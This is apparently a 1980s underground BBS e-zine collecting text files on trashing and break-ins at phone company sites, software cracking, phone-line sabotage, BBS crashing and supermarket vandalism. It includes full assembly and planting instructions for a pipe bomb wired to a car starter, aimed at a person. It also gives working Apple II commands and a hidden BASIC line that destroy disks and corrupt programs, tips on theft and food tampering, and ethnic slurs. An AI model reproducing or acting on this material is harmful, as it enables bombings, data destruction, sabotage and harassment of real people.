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This magazine NEEDS�SUPPORT ! �������������������� NOTICE: TO ALL CONCERNED Certain of the articles in this catalog deal with activities and devices which would be in violation of the Law if actually carried out or constructed. 2280 Magazine DOES NOT advocate the breaking of any law. This Magazine is distributed for Informational purposes ONLY. We recommend that you contact your local law enforcement officials before undertaking any project based upon information in this magazine. We ARE NOT responsible for, nor do we assume any liability for, damages resulting from the use of information in this catalog. THIS MAGAZINE IS DISTRIBUTED FOR INFORMATIONAL PURPOSES ONLY This Magazine is for the use of adults only. Under no circumstances are children to view or possess it. ** NEWSFLASH: 2280 Magazine is no longer to be distributed as a file. If you would like to recieve the next 2280 magazine, or discuss anything to do with 2280 Magazine, contact The Master on The Arena BBS Information Service [0625]/539-063. If you would like 2280 Magazine delivered, please send the small fee of 1 pound, for posting, photocopying, etc. to: 2280 Magazine, Distribution dept. 59, Knutsford Rd, Wilmslow, Cheshire. SK9 6JD Cheques made out to : 2280 Magazine, Credit card numbers only accepted with the holder's signature. == 2280 Magazine == INDEX [2] Trashing ............................ The Basics of Trashing explained. [4] Cracking ............................ Part ][ of Buck's Cracking college. [6] Anarchy I ........................... Making a Pipebomb. [8] Scarlet Boxes ....................... US Neighbor harrasment! [10] Crashing ........................... A BBS Crashing tutorial by Dr. Crunch. [14] Anarchy II ......................... Supermarket Fun! [17] Memory Lane ........................ The history of British Phreak- ing as told by An american! [21] Data Snooping ...................... Practical Data Snooping. --Page 1-- :%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%: :% %: :% BASIC TRASHING MANUAL %: :% Written by: %: :% The Blue Buccaneer %: :% %: :% The Rebel Alliance MegCatLine : [615]-940-6670 %: :% %: :%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%: This is an elementry manual on trashing. I don't think I am qualified to do one on advanced trashing, so here are the basics: :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: Trashing is the act of sorting through trash captured from the garbage bins and cans of your local MaBell office. The trash often contains many valuable things which can range from office memos instructing an operator to carry out a special task (trace someone's line..etc) to actual working phones! In addition to those things, you are also very likely to pick up Bell manuals (they have this habit of replacing them every time one word is revised) The following is a list of suggested instructions and tips to follow when or if you go trashing. Trashing can be quite profitable and fun, provided you do it right and don't get smelly, dirty, or busted. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: STEP #1: LOCATE YOUR TARGET This involves deciding on where exactly the place is you want to trash. The place you want to go trashing at is the Switching Office since that's where everything happens. The easiest way to find the S.O. is to look for a lot of microwave towers. (not too hard, eh?) A good place for advanced trashing is your local COSMOS Office. To find it, look for the place in your city which most resembles: 1. A Castle or Fort 2. A Bunker out of WWII. 3. Your local Federal Prison. 4. A Building with the slogan "The more you hear.." on it. The security around these places is that of any of the 1, 2, or 3. Other possible targets would include: 1. Relay stations. 1. Look for a medium to small size tower with a little shack. 2. Look for a big-ass tower with a house with AT&T on the door. The little shacks are usually good to break into because they are left with some really good stuff and are usually out in the middle (maybe a little to the west) or nowhere. I've never been into the houses. You can easily spot them because of the towers in the backyard and the odd fact that they have only one door (the front) and no (0) windows. STEP #2:SCOUT THE TARGET AREA One person should go out to the place you plan to trash and take a good look around. He should look for: Doors, cameras, fences, dogs, and the garbage bins. This is to minimize the amount of confusion when you go trashing that night or whenever-the-hell you go. The scout might want to make out a small map of the streets & stuff in the area if the group is unfamiliar with it. You might also want to use it for quick, safe escape routes. --Page 2-- STEP #3:GATHER EQUIPMENT Here is a brief list of equipment you might want to take along: MAP : Streets, doors, security guards/cameras, garbage bins, etc... CAR : Doors and trunk open (lights off) Liscence Plate Covered While the car is not necessary, it is helpful in quick getaways and is easier than biking or walking. PEOPLE: More than one; Less than six. Almost never go trashing alone. And never bring more than five guys along with you. It's a little obvious when you have six or seven teenage guys with sacks, dark clothing, and flashlights. The recommended group is three, but a duty chart shows more or less: Number of people: 1 2 3 4 5 6 Number to search: 1 1 2 3 3 4 Number to watch : 0 1 1 1 2 2 --- BEST WAY ---: ^ EQUIP : Sack (each - nylon recommended as is light & easily washed/hidden) FlashLight (each - with handkerchief) Use the handkerchief to cover the lmght at all times. (Light looks really unusual comming out of a garbage bin at 3am) Sneakers (ratty as possible - it is, afterall, garbage) Dark Clothing (no bright orange or other florecent materials) <+- ADVANCED EQUIPMENT -+> Nitefinder goggles Ski Mask Gloves Walkie Talkies / CB Radio Lockpicks A word on the lockpicks: Lockpicks are very handy to have if the garbage is locked up. BUT DO NOT bring them if you don't know for a fact that there are locks -or- if you don't know how to use them correctly. Should you get caught, you don't want to have attempted breaking and entry and shit like that trying to be pinned on you. Diversion Equipment: Smoke, Gas, Bang, or Flame bombs Bring only that- no pipe bombs, soda can bombs, or harmful stuff like that. If you get caught with that stuff, they get nasty. It is also tempting to level the garbage bin just before you leave, which is not too wise. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: AND NOW, THE EVER PRESENT: DOs and DON'Ts If you're going advanced trashing, bring along a voltage meter to test fences, doors, and stuff that might be electrically wired or monitored. DO NOT go poking around anywhere other than the bins. There are probably silent alarms on the doors and possibly hidden cameras watching those other places you might feel tempted to go poking around. DO NOT make a lot of noise. Tipping over the cans and telling dead baby jokes is generally unwise. // FILE ABRUPTLY ENDS // --Page 3-- *************************************************************************** * B U C K A R O O B A N Z A I * * * * presents * * * * Cracking On the IBMpc * * Part II * * * *************************************************************************** Introduction ------------ Ok guys, you now passed out of Kopy Klass 101 (dos files) and have this great w game with overlays. How the phuck do I crack this bitch. You scanned the entire .EXE file for the CD 13 and it's nowhere. Where can it be yo ask yourself. In part II, I'll cover cracking Overlays and the use of locksmith in cracking. If you haven't read part I, then I suggest you do so. The 2 files go together. Looking for Overlays -------------------- So, you cant find CD 13 in the .EXE file, well, it can mean 4 things. 1, the XE (though it is mostly .COM) file is just a loader for the main file. 2, the .E file loads in an overlay. 3, the CD 13 is encrypted &/or hidden in the .EXE fi . 4, your looking at the WRONG PHUCKEN PHILE. I won't discuss case 1 (or at least no here) because so many UNP files are dev ed to PROLOCK and SOFTGUARD, if you can't figure it out with them, your PHUCKEN stupid. If you have case 3, use the techinque in part I and restart from the beg. And you have case 4, shoot your self. You know the program uses overlays but don't see and on disk? Try looking at e disk with good old nortons. Any hidden files are probally the overlays. Thes are the ones we are after. If you still can't find them, use PC-WATCH (this pro am is a must!!! for all crackists. Traps ALL interrupts). Using PC-Watch to Find Overlays ------------------------------- Start up PC-Watch and and EXCLUDE everything in the left col. Search the righ col. until you find DOS21 - OpnFile and select it. Now run the program to be cr ked. Play the game until the protection is checked. Examine you pcwatch output o see what file was loaded right before it. This probally is the one holding th check. If not, shit go through all the files. You Have Found the Overlays --------------------------- Great, now just crack the overlay as if it was a DOS file. You don't need to rry about .EXE file, debug can write an overlay file. Part I explains the basic of cracking. I suggest that you keep a backup copy of the overlay so if you phu up, and you will, you can recover quickly. Ah, and you thought cracking with ov lays was going to be hard. Locksmith and Cracking ---------------------- The copy/disk utility program Locksmith by AlphaLogic is a great tool in cracki . It's analyzing ability is great for determining what and where the protection s. I find it useful, before I even start cracking, to analyze the protected disk t find and id it's protection. This helps in 2 ways. First, it helps you to know --Page 4-- hat to do in order to fake out the protection. Second, it helps you to find wha the program is looking for. I suggest that you get locksmith if you don't already have it. Check your loca pirate board for the program. I also suggest getting PC-Watch and Norton Utilit s 3.1. All of these program have many uses in the cracking world. Have Phun Phucker Buckaroo Banzai The Banzai Institute special thanks to the Honk Kong Cavliers --Page 5-- [%+-------------------------------------------------------------------------+%] [% %] [% Rocket Engine Pipe Bomb %] [% %] [% Written by: Blue Max %] [% %] [%+-------------------------------------------------------------------------+%] [% %] [% Call these ten meg systems: %] [% The Pitstop AE/Cat-Fur/BBS...............................504-774-7126 %] [% The Lighthouse AE Pw/OCEAN..............................504-291-5690 %] [% The Trading Post BBS.....................................504-291-4970 %] [% LOUISIANA'S FINIST %] [% %] [%+-------------------------------------------------------------------------+%] Equipment ^^^^^^^^^ The equipment needed can be found anywhere. There are as follows: 1) 1, 6 to 10 inch Threaded Lead Pipe (2 to 3 inches in Diameter) 2) 2 Matching pipe caps 3) Black Gunpowder 4) Model Rocketry Electric Fuse 5) Black Electrical Tape 6) 2 10 inch wires with alligator clips 7) 1/2 inch drill bit and drill 8) Daily Newspaper [%+-----------------------------------------------------------------------+%] Assembly ^^^^^^^^ 1) Place pipe in a machinest vise and with drill, drill a 1/2 inch hole in the center of the pipe. 2) Screw a pipe cap onto the pipe and fasten tightly. 3) Insert electrical fuse into the 1/2 inch hole. 4) Place pipe upright with cap on bottom and fill with the gunpowder. 5) Wrap tape around fuse and pipe a couple of times to keep the fuse in place. 6) Stuff a wad of paper into the extra cap for packing the powder into the pipe tight to make a better explosion. 7) Pack the gunpowder by hand first and put in more gunpowder if needed and then screw the cap with the paper in it on the pipe for even more packing. 8) Antipersonal device is ready for planting and detonation. --Page 6-- [%+------------------------------------------------------------------------+%] Planting ^^^^^^^^ 1) Tpae pipe bomb inside of a tire on a car. This works especially well on a teachers car that you do not like at school. 2) Run one alligator clamp from the fuse to the starter terminal to make a hot wire running between them. 3) Run Second alligator clamp from the other wire of the fuse to any ground to the car like the axilor springs. Should look a little like this: (note: I am no artist.) ____ ____ | | /-- pipe bomb | | | |\ _|_ ___\ / /| | | | \<_>__<__>\ /_______/ | | | | _________\---|___________ | | | | / Starter | \ | | | |/ \| | |__| |__| Don't forget the wires between the starter and bomb fuse and the ground. [%+------------------------------------------------------------------------+%] Detonation ^^^^^^^^^^ All there is left is the detonation of the bomb. When the unexpected victim oes to start his car, the electrical charge coming through the starter will set off the bomb and blow the tire to smithereens. H A V E F U N ! ! ! _ _ _ _ _ _ _ _ _ _ _ Blue Max [%+-------------------------------------------------------------------------+%] --Page 7-- [/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/] [ ] [ Scarlet box plans ] [ ----------------- ] [ A High Mtn Hackerz Presentation ] [ ] [ Written & Created by: THE PIMP ] [ ] [ Call these cool Systems: ] [ ] [(Maharaja's Hi-Times 10meg C/F BBS)] [ |7 0 2 - 8 3 2 - 7 4 6 9| ] [ ] [ (The Stash 10 meg BBS C/F) ] [ |7 0 2 - 8 3 1 - 4 2 6 3| ] [ ] [/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/] The purpose of a Scarlet box is to create a very bad conection, it can be used to crash a BBS or just make life miserable for those you seek to avenge. Materials: 2 aligator clips, 3 inch wire, or a resister (plan wire will create greatest amount of static) (Resister will decrease the amount of static in porportion to the resister you are useing) Step (1): Find the phone box at your victims house, and pop the cover off. Step (2): Find the two prongs that the phone line you wish to box are connected too. Step (3): Hook your aligator clips to your (wire/resister). Step (4): Find the lower middle prong and take off all wires connected to it, i think this disables the gound and call waiting and shit like that. Step (5): Now take one of the aligator clips and attach it to the upper most prong, and take the other and attach it to the lower middle prong. Step (6): Now put the cover back on the box and take off!! --Page 8-- ** ######## ** ** # #### # ** ######## / # #### # / ######## / / / / / / / / **/ ** ** ** ** ** (**)= prongs ** (/) = (wire/resister) (##)= some phone bullshit Created by (The Pimp) --Page 9-- WHAT TO DO WHEN YOU BREAK INTO A BBS ==================================== BY -=> DOCTOR CRUNCH <=- OK, YOU PROBABLY HAVE READ T-FILES ABOUT HOW TO BREAK IN A BBS. SO, I WILL TELL YOU WHAT TO DO WHEN YOU GET INTO THE BBS. MOST SYSOPS, IF THEY HAVE AN IQ, WILL DISABLE THE INIT COMMAND. THEY USUALLY DO THIS BY CHANGING THE INIT COMMAND TO SOME OTHER WORD YOU WILL NEVER GUESS. WELL, THERE IS AN EASIER WAY TO CRASH THE BBS THAN BY SEARCHING FOR WHAT THE SYSOP CHANGED IT TO. GET IN THE MONITER (CALL-151), AND TYPE: A54FG THIS IS THE INIT COMMAND'S ENTRY POINT WHICH DOS CALLS TO INITIALIZE A DISK. THERE ARE SOME BUGS WITH THIS WAY OF CRASHING A DISK THOUGH: 1) IT TAKES ABOUT 40 SECONDS TO INIT A DISK, AND 9F A SYSOP IS THERE, HE CAN STOP YOU AT ANY TIME. 2) MANY BOARDS USE A FAST DOS; AND, MOST FAST-DOSES HAD TO TAKE OUT THE INIT COMMAND TO MAKE THE MODS TO DOS. SO, EVEN IF YOU DO A A54FG, YOU WON'T BE ABLE TO KILL THE DISK. I PREFER TO KILL THE VTOC, INSTEAD OF INITING THE DISK. HERE ARE A COUPLE OF REASONS WHY: 1) VERY QUICK!!!!! 2) VERY NASTY!!!!! THE TRICK IS TO REWRITE THE VTOC (VOLUME TABLE OF CONTENTS) TO SAY THAT THE CATALOG TRACK IS 255. NOW ALL OF US KNOW THERE IS NO TRACK 255 ON A DISK, THIS CAN ONLY MEAN.....(YOU GUESSED IT) THAT THE SYSTEM WILL BOMB WHEN DOING ANYTHING THAT INVOLVES LOOKING AT THE CATALOG TRACK. SINCE ALMOST EVERYTHING YOU CAN DO IN DOS INVOLVES READING THE CATALOG TRACK, THIS WILL CRASH THE BBS QUITE WELL. AND HERE IS A NICE LITTLE CATCH, YOU CAN REBOOT HIS DISK (WHICH WILL GIVE HIM AN I/O ERROR BECAUSE WHEN THE HELLO FILE IS RUN, DOS MUST LOOK AT THE CATALOG TRACK) AND LOGOFF AT THE SAME TIME. YOU SHOULD ALWAYS LOGOFF QUICKLY SO THAT THE SYSOP CAN'T LIFT UP THE PHONE, WHICH SOMETIMES WILL PREVENT YOU FROM HANGING UP. THE WAY I LOGOFF IS THE MAKE THE BBS I JUST CRASHED DO A RESET, CAUSING ME TO BE DISCONNECTED FROM THE OTHER END OF THE LINE. SINCE MOST TERMINAL PROGRAMS HANG UP IF YOU LOOSE THE CARRIER (WHICH WILL HAPPEN WHEN HIS SYSTEM RESETS), YOU WILL HANG UP THE SECOND YOU CRASH HIS SYSTEM!!!! WELL, HERE IT IS: (BE SURE YOU'RE IN THE MONITER) *B3BC:FF NAFFBG 3F4:00 NFA62G IF YOU DON'T WANT TO LOGOFF, *B3BC:FF NAFFBG NOTE: SOMETIMES YOU MAY HEAR A BEEP, THEN ALL OF YOUR MONITER COMMANDS WILL FAIL. THIS IS BECAUSE OF A BUG IN DOS. WHEN RWTS LETS GO OF CONTROL, THE MONITER VARIBLE $48 IS DESTROYED. TO WORK PROPERLY, $48 MUST BE RESTORED TO 0 BEFORE THE MONITER TAKES CONTROL AGAIN. I MADE A SHORT ROUTINE THAT WHEN CALLED, WRITES THE VTOC BUFFER TO THE DISK, AND SETS $48 TO 0. THE ROUTINE IS: --Page 10-- 300- 20 FB AF JSR $AFFB 302- A9 00 LDA #$00 304- 85 48 STA $48 306- 60 RTS SOMETIMES IT IS DESIRABLE TO CRASH THE DISKS IN DRIVE 1 AND DRIVE 2. THIS CAN BE DONE IN 1 LINE, INCLUDING THE QUICK LOGOFF: *300:20 FB AF A9 00 85 48 60 N B3BC:FF NB5F8:1 (DRV1) N300G B5F8:2 N300G 3F4:FF N FA62G WELL, THAT'S ALL FOLKS!!! HAVE LOTS OF FUN...... ============== 3>DR. CRUNCH<+ ============== -=*> P.S. I WAS MESSING AROUND WITH DOS A COUPLE OF DAYS AGO AND I FIGURED OUT A REAL, REAL, REAL, NASTY ONE. YOU HAVE PROBABLY HEARD OF LETTING THE DRIVE SPIN FOR A COUPLE OF DAYS TO RUIN IT. THIS WORX, BUT IT TAKES A LONG TIME... I LIKE THIS 1 BETTER: *BDCC:EA EA NBDDA:EA EA THIS MODS DOS TO RECALIBRATE THE DRIVE HEAD FOREVER (UNLESS THE SYSOP WALKS IN). SO, ALL YOU DO NOW IS USE A DOS COMMAND THAT READS THE DISK, AND THE DRIVE IS GOING TO MAKE ALOT OF FUNNY SOUNDS! CATALOG IS THE BEST ONE TO USE, SINCE IT IS IN ALMOST EVERY DOS UNMODIFIED. ===== NOTE: THIS SHOULD ONLY BE DONE WHEN ===== THERE IS A VERY, VERY, GOOD REASON TO WASTE SOME DUDES DRIVE. DON'T EVER DO THIS AS A PRANK, BECAUSE IT WORKS! ZATZ IT.. )>DR. CRUCH<( /\_________________________________________________________________________/\ \/ \/ BBS CRASHING: MORE NIFTY TRIX ***************************** * BY DR. CRUNCH * *>-------------------------<* *) TYPED AND UPLOADED FOR: (* *) THE ASSASSIN'S KNOT (* *>-------------------------<* * STONEHENGE(814)237-5635 * ***************************** BBS CRASHING: MORE NIFTY TRIX WELL, I HAD SUCH A FUN TYME PUTTING NIFTY STUFF IN MY LAST T-FILE, I DECIDED TO DO IT AGAIN. IN THIS FILE I WILL DISCUSS THE TYME BOMB, THE SNEAKY SPUD, AND THE BUGGER. THEY ALL ARE GREAT FOR REVENGE, GETTING EVEN, AND JUST BEING A PAIN IN THE A$$. WELL, I WON'T KEEP YOU SUSPENDED ANYMORE, HERE THEY ARE! --Page 11-- TYME BOMB ========= THIS CRASH TAKES A LONG TIME TO WORK, BUT THERE IS ALMOST NO WAY TO DETECT IT. IT INVOLVES ADDING A LINE IN A COMMON USED PLACE, BUT NOT TOO COMMON. THAT MEANS, THE G-FILE SECTION OF A BBS IS A GOOD PLACE, BUT THE MAIN MENU IS NOT. ONCE YOU HAVE DECIDED WHERE TO PUT IT, FIND TWO FAT LINES IN THAT AREA. THESE LINES WILL BE THE DISGUISE LINES. YOU WILL PLACE A LINE BETWEEN THEM, AND THEY WILL CAMOUFLAGE IT (HOPEFULLY). NOW INSERT THIS LINE RIGHT AFTER THE FIRST DISGUISE LINE, AND BEFORE THE SECOND. LIKE THIS: 10130 XXXXXXXX DISGUISE LINE XXXXXX 10134 POKE INT(RND(1)*30000)+2053,0 10140 XXXXXXXX DISGUISE LINE XXXXXX THIS WILL, EVERY TIME IT HITS LINE 10134, POKE A RANDOM BYTE IN THE PROGRAM TO 0. ALL OF YOU APPLESOFT HACKERS OUT THERE SHOULD REMEMBER THAT APPLESOFT USES THE BYTE 0 TO SIGNAL THE END OF A LINE; MEANING: THE ENDS OF SOME LINES WILL START TO DISAPEAR. I PARTICULARLY LIKE THIS LITTLE TRICK BECUZ WHEN BUGS DO APPEAR IN THE PROG- RAM, THEY ARE ALMOST NEVER NEAR THE LINE WE INSERTED. THE BUGS APPEAR SO SLOWLY THAT, BY THE TIME THEY ARE DISCOVERED, A BACKUP OF THE BBS PROGRAM CONTAINING OUR LITTLE LINE HAS USUALLY BEEN MADE. SO, WHEN THE SYSOP BEGINS TO USE HIS BACKUP COPY, OUR LITTLE BUG WILL AGAIN BEGIN TO GNAW AWAY AT THE HOST PROGRAM. NOW LETS GET SOME TERMS DOWN. A CRASH THAT IS INSERTED IN THE BBS AND SLOWLY DESTROYS IT IS CALLED A PARASITE. THE PROGRAM THE PARASITE IS KILLING IS CALLED THE HOST PROGRAM. (SOUNDS LIKE BIOLOGY, EH?) STEP BY STEP: 1) GET INTO THE BBS SOMEHOW 2) FIND A COMMONLY USED PLACE, BUT NOT TOO COMMON. 3) INSERT THE PARASITE LINE BETWEEN TWO DISGUISE LINES. 4)>BE SURE TO SAVE THE HOST PROGRAM AFTER THE PARASITE HAS BEEN PUT IN IT! IF YOU DON'T, WHEN THE HOST PROGRAM'S COMPUTER IS TURNED OFF, THE PARASITE WILL BE LOST. ====================================== SNEAKY SPUD WHO WOULD A SYSOP LEAST EXPECT TO CRASH HIS BOARD? HIMSELF! THIS LITTLE CRASH INVOLVES MODIFYING DOS SO THAT WHEN THE DRIVE IS CATALOGED THE DISK IS INITIALIZED INSTEAD. NOW YOU COULD, YOURSELF, INITIALIZE THE DISK, BUT IT IS MUCH MORE FUN TO LET THE SYSOP DO IT FOR HIMSELF. WHY? 1) HE CAN'T FIND OUT WHO DID IT. 2) IF HE CRASHES HIS OWN BBS, HE WILL MAKE HIMSELF A COMPLETE ASS, AND YOU TORMENT HIM WITH THAT INFORMATION UNTIL HE CRIES! LETS SEE HOW THIS DONE. 1) GET INTO THE MONITER. --Page 12-- 2) TYPE "A56E:4C 4F A5" 3) EXIT TO BASIC (3D0G) 4) RERUN THE PROGRAM SO IT WILL LOG YOU OFF. 5) CALL THE BOARD BACK AND LOGON NEW UNDER SOME NAME LIKE: THE TIDY BOWL MAN OR FAT ALBERT OR UTAH JACK OR (WHO GIVES A DAMN?). 6) SEND HIM SOME FEEDBACK THAT WILL MAKE HIM CATALOG THE DISK. SUCH AS: EVERYTIME I TRY TO POST OR SEND MAIL TO A USER I GET THIS MESSAGE THEN I GET LOGGED OFF! I'M NOT SURE, BUT I THINK THAT YOUR DRIVE IS FULL. TO BE ON THE SAFE SIDE, TAKE A CATALOG OF THEM AND SEE IF THERE ARE MORE THAN 122 FILES. EVEN THOUGH YOU MAY HAVE FREE SECTOS, YOU MAY NOT HAVE ENOUGH ROOM IN THE CATALOG FOR MORE FILE NAMES. I HOPE YOU GET IT FIXED SOON! LAT0R0N MAN, S P U D P E A L E R ======= =========== 7) LOGOFF. NOW WHEN HE SEES YOUR MESSAGE AND TAKES A CATALOG HE WILL GET HIS DISK FRIED. HE WILL PROBABLY BE ABLE TO HIT RESET BEFORE THE DISK IS INITED COMPLETELY, BUT ENOUGH WILL BE ERASED TO SCREW HIM UP. ====================================== THE BUGGER THIS ONE IS EASY. LOG ONTO A BOARD THAT IS EASY TO BREAK INTO AND DELETE SOME LINES OF YOUR CHOICE. THEN SAVE IT. DO THIS EVERY DAY OR SO FOR A MONTH. AT THE END OF THE MONTH THE SYSOP WILL BE IN THE RUBBER ROOM SINGING JINGLE BELLS WHILE PLAYING A GAME OF HOPSCOTCH. ====================================== WELL, THAT WRAPS UP ANOTHER EXCITING EPISODE OF "CRASHING CHRONICLES". ZATZ ALL! )>DR. CRUNCH<( --Page 13-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -*-*-*-*-*-*-*-*-*-*-*-*-*-*- \ __ __ / / |__' |__ \ \ .__|upermarket | un / / \ -*-*-*-*-*-*-*-*-*-*-*-*-*-*- ...By the prolific 007 007... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- As some of you might have already guessed, this phile will tell you all about how to have loads of fun in any supermarket or grocery store. There are many different things to do in a supermarket that will provide entertainment as well as pissing off people in general. First, though, you should get some friends to increase the entertainment value of the whole excursion, as well as to provide even more destruction. I've found that you can get away with a lot of things (playing chase throughout the aisles, playing soccer or football with various perishables, etc.) and no one will say anything. If anyone does say anything, do the kindly anarchist thing and tell them to fuck off. Ok. One very fun thing to do is fuck with the shopping carts themselves. You can fill up many carts and then strew them all around the store, for ex- ample. I'm sure that almost every employee just loves to spend their time ridding the store of the bogus carts you created. Or maybe you would rather gather ten or so carts and then make barriers in aisles when no one is looking. Wouldn't you like to hear "Um...Frank..someone seems to have made a collection of carts in aisle four, so could you clean it up please, thank you..." announc- ed over the loudspeaker system of your nearest Giant or Safeway? Or you can have your very own shopping cart drag races in the frozen food section. Per- haps you're one of the more destructive types. If you are, then "bumper carts" is just for you. Just smash the carts into one another and relive those magic childhood moments at the carnival. One VERY funny stunt that produces great results is fucking with other people's carts. Just go around throwing things into carts when the owner is not looking. "Wait a minute..where the hell did this damn watermelon come from?! I hate watermelons." Doing that can great- ly confuse a person, so go ahead, make someone think they're goin' crazy! Another fun thing to do at a grocery store is, of course, playing with the food. See how many times you and a friend can throw toilet paper over aisle eight without hitting anyone. You can always go for 'distance' by throwing fruits or vegetables over as many aisles as possible. Or perhaps you would rather test your bowling skills. Just stack up anything handy (paper towels, cans, plastic soda bottles, etc.) and roll any sphere like object at it (mel- ons, or perhaps a can of Kool Aid?) You could always play a quick game of basketball. Just set up an empty cart and find something that bounces (or doesn't), then go for those three point shots. In fact, almost every major sport (except water polo, but that's not a major sport, now is it?) can be played with ease at your closest supermarket or grocery store. Pissing off the employees is also entertaining. I'm sure you can think of many ways to do this, but try the following. Trying to buy alcohol if you're under age (insist that you aren't!), shouting obscenities, eating 'bulk' food right out of the container, dropping (accidentally of course!) a few glass bot- tles, going down to where the employees eat and just sit at the table, and also try to buy nine packs of gum in the '8 items or less' lane. You could also try loitering, just sit at the magazine rack and catch up on your reading. Another fun thing to do is to keep bugging an employee hard at work. I'm sure an em- --Page 14-- ployee would appreciate it if you dragged him from his task just so you could buy one red hot from the bulk food section. Yet another entertaining thing to do is cause the store to lose customers. The easiest way to do this is to just buy something so you and a friend can get in line. Then look at what the person ahead of you is getting and tell you friend that "whatever the next person has" was laced with poison or something to that effect. Oh, here's yet another entertaining thing to do. Go outside the store and look for carts that are full and just sitting there with no on by them (the owner has gone to get his/her car). When you have found such a cart, take some bags or better yet, take the whole cart. Now you have a weeks worth of free groceries. So get some friends together and have a party (what else would you do with six bags of food?) If the owner suddenly appears while you are "buy- ing" your groceries, just push the cart as hard as you can at him/her and take off. If you are lucky enough two find two of these carts, then you can have some real fun. Just start taking things out of one cart and chuck it in the other, better yet, just exchange bags! Then sit back and watch the confusion. Although the people probably won't notice the difference until they get home and unpack. Don't you wish you could see their reaction?! Oh, you could also just take someones cart and move it down a bit...that way you could see their reaction and that would of course increase your enjoyment. A vast amount of fun can be had in the frozen food section. Just take some frozen products or ice cream and put them in one of those deserted aisles so they can thaw out. After that, cruise over to where ever the food coloring is kept and snag some. Then go back to frozen foods and find some nice ice cream. Now just open up ice cream containers and put about thirty drops of red (or whatever color) food coloring in 'em. Wouldn't YOU be surprised if you opened up a half gallon of vanilla ice cream at home and found red designs all over the place?? Do you want to get people in trouble? Then you can have lots of fun screwing with the prices of things. You can take some steaks and throw 'em into the "reduced food section". Most people are stupid and would jump at the chance to get a turkey for a few bucks. Or, you could just take a large marker into the store with you and write "5 cents" on everything you see. Write it on donut boxes, cereal boxes, soda bottles, or anything you see. My last topic is everyone's favorite, taking what is not rightfully yours (shoplifting, dumbass) It's surprisingly simple to lift things from grocery stores. I'm not going to give you a shoplifting tutorial here though, if you need to read a phile to learn how to lift, you're an idiot. Also, you can eat things right in the store if you want. Just take your snack to a deserted aisle and then satisfy your stomach. Of course, the only thing you could steal from Giant is food (or those cheap plastic toys often found in grocery stores, but why would you want those?), and since a box of cereal is a bit to obvious under one's shirt, I suggest candy. But go ahead and take what you want, I couldn't give a shit. Well, I was wrong, I have one more thing I want to tell you about (gee I'm tricky...) Ok, have you ever seen those swinging double-doors in the back near the meat?? These doors can lead you to loads of fun. Back there they store all their excess until they have room for it. So you can go back there and fuck around like crazy (if anyone asks you what the hell you're doing back there, just say you're going to the bathroom, the bathrooms are ALWAYS back there somewhere), doing whatever the hell you want. Try rearranging anything you may find back there. Go ahead, screw up their inventory! Hi....welp, these are the new parts for all you keeping score... Ok, I've mentioned some of the fun you can have with the shopping carts --Page 15-- themselves. Now, another thing you can do with them is just throw them all over the place. Get a few empty ones and take 'em out to the parking lot. Here you can "automate" the carts by seeing how far they'll go on their own. Give 'em a big push and they're off! Try to push them into car's paths, I'm sure the driver will appreciate it. I'm REAL sorry about that Ms. Jones, I had no idea you'd swerve like that and end up with a boy and his bike as your new hood ornament. Also, you can make a nice big accident by hurling a bunch of them all together. Wham!! Awwww...too bad...looks like a few of the things have been mangled to hell. Oh, all these carts would also make a mighty fine roadblock, wouldn't you say?? After completely smashing them, you might want to return them to the store...just so they know that new ones will have to be bought. Just to see what the employees say, bring along a box with a melodious tune of Suicidal Tendencies being cranked out. I doubt that many people would approve of this (which is why you're doing it). Anyway, when someone tries to talk to you, don't say a damn thing. Pretend your foreign, deaf, whatever, just don't speak. This will get people even more pissed off. At this point they'll probably call security (woaaahhhhh....those Rent-A-Cops are SCARY!!) or something and try to force you out. Let 'em, don't try to resist at all. When you get outside just point at them and start laughing like crazy. Here you can enter a convulsive fit or whatever works for you. I've mentioned stealing things...well, if you don't have the guts for actually lifting things, there is an alternative. Simply exchange price tags, this way it's not really lifting, just a damn good bargain. If you're going to do this, try to get in some dumbfuck foreigners lane (Note: With all the damn Arabs and whatnot at 7-Eleven, this can always be done there). If the cashier doubts the price, just play it off. Oh, here's another idea that deal with price tags. Try to steal one of those "tag guns" that the employees use to price items. This way you can make people get items they usually wouldn't (because of your low, LOW price). When the person goes to checkout and the item(s) goes through the little scanner thing, hahaha! It's damn funny to see the people arguing over the price...and it holds up the line as well. Ok, for this next little topic, you'll need some kinda foreign currency (like that real great one, the peso...). Oh, you can pick up some pesos or another kind of currency at a bank that specializes in exchanging currencies. When you have your foreign dough, go to the supermarket and pick out a few items (doesn't matter what they are). Then proceed to checkout and when given the total, just give the pesos or whatever to the cashier. When the idiot tells you that you can't use that. Start screaming in another language (or if you're to lame to know one, make one up) and have a fit. Make it clear (non-verbally of course) that you want to pay with your pesos. Take it as far is it will go, and then throw the money at the dumb bitch and leave. Well, I hope you have all learned something from this tutorial on how to fuck with your grocery store. Oh, and I >>>AM<<< responsible for whatever ac- tions you may take as a result of reading this phile. When you get in trouble, just go ahead and say 007 told you to do it. "Well you see Mr. Rent-A-Cop, there was this phile on a BBS around NY that told me to do it!"...maybe it'll even get written up in NewsWeek by our hero the journalist, Mr. Sandza! :=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=: : The previous phile has been brought to you by.... : :_____________ _____________: : ...10/31/87| Purgatory Productions |...10/31/87 : 